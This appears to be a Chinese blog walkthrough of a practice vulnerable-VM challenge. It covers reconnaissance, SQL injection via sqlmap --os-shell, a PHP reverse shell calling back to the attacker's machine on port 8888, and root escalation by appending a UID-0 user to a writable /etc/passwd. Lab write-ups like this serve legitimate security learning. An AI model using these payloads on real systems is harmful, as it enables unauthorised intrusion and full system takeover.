0x00背景

又开始打靶了,放假太无聊了吧。其实也是因为我被放养了。。。算了,提升自己吧。。。

闲暇之余逛社区发现了最初的一篇靶机复现的文章,我看还挺小的环境直接几分钟下好下来直接干!

靶机环境什么的看最后的参考文章吧。

0x01冲冲冲

启动环境:

1619939826997

好了,也是NAT和我的kali同段,看下IP:

arp-scan -l:

1619940115372

那他铁定136了。(kali128)

接着nmap探测端口:

稳当就这个web页面直接搞.

先用dirsearch进行目录扫描发现:

1619949777381

发现robots.txt看一下文件:

1619949814293

1619949892582

这个目录下没啥东西了,换一个目录:

1619958160545

看一下这个login页面:

1619958193307

可以。。一看就是sql注入。sqlmap一把梭哈吧。

直接用–os-shell搞,之前泄露的phpinfo正好有绝对路径:

1619958662700

1619958741642

好像根目录没有写权限。这个时候有个莫名其妙的uploads目录就起到作用了我们看之前的robots:

1619958791548

猜测这个目录可写。那么换成这个目录:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

接着–os-shell:

1619958870803

OK弹回来了。这个时候有几种思路要么写个php木马要么直接弹shell。

kali里面没装什么webshell管理工具。直接写个php的反弹shell马进去吧:

<?php
$sock=fsockopen("192.168.116.128",8888);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

1619959301681

然后回到–os-shell下载:

紧接着直接运行。kali监听下:

OKshell回来了。

1619959412072

python加载下pty好看些。当然这会儿可以输入history这些交互命令了。

python -c 'import pty;pty.spawn("/bin/bash")'

1619959552576

只有个www-data权限,需要提权:

看一下系统内核,uname -a

感觉不行。。然后百度了哈别人打靶机,新增加一个用户就提权?

再重新翻了下,发现了别人说的很精辟的:

这个用户可以对/etc/passwd 文件进行写入权限

对头看下/etc/passwd:

1619959750080

还真是。。无语。靶机就是靶机。强行让我们提权。那就加个用户。

这里还有一个点写入的密码是加密的需要先进行加密:
openssl passwd -1 -salt cupid 111111
然后直接写:
echo 'cupid:$1$cupid$8tYgJJZNFSEMBWziH72a6/:0:0::/root:/bin/bash'>>/etc/passwd

最后切换到cupid用户,在root目录下拿到flag:

1619959989909

0x02结束

呃。。挺基础的一个靶场。不过简单嘛。体验也很好。

参考文章:博客园同复现